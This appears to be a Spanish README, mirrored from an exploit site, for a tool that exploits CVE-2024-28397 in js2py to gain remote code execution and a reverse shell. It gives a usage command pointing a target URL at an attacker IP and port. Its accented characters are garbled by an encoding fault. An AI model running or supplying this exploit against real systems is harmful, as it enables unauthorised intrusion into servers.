Share
## https://sploitus.com/exploit?id=494AE353-1C53-5CFC-AAED-53BFF4F22B7F
# js2py Sandbox Escape (CVE-2024-28397)

Exploit para ejecuci贸n remota de comandos (RCE) mediante escape del sandbox
en **js2py <= 0.74**.

Permite ejecutar c贸digo arbitrario en el sistema anfitri贸n a trav茅s de
evaluaci贸n de JavaScript insegura.

---

## Vulnerabilidad

- **CVE**: CVE-2024-28397
- **Componente**: js2py
- **Versiones afectadas**: <= 0.74
- **Impacto**: Remote Code Execution
- **Vector**: JavaScript sandbox escape
- **An谩lisis vulnerabilidad**: [CVE-2024-28397-js2py-Sandbox-Escape](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape)

---

## Caracter铆sticas

- Escape de sandbox
- Ejecuci贸n de comandos v铆a `subprocess.Popen`
- Reverse shell
- Sin dependencias externas en el target

---

## Requisitos

- Python 3.8+
- Acceso a un endpoint vulnerable que eval煤e JS con js2py

Dependencias:

```bash
pip install -r requirements.txt
```

---

## Uso

```bash
python3 exploit.py -U http://target_url -H IP -P PUERTO
```

---

# Advertencia legal

Este proyecto se proporciona 煤nicamente con fines educativos y para
auditor铆as de seguridad autorizadas.

El autor no se hace responsable del uso indebido de esta herramienta.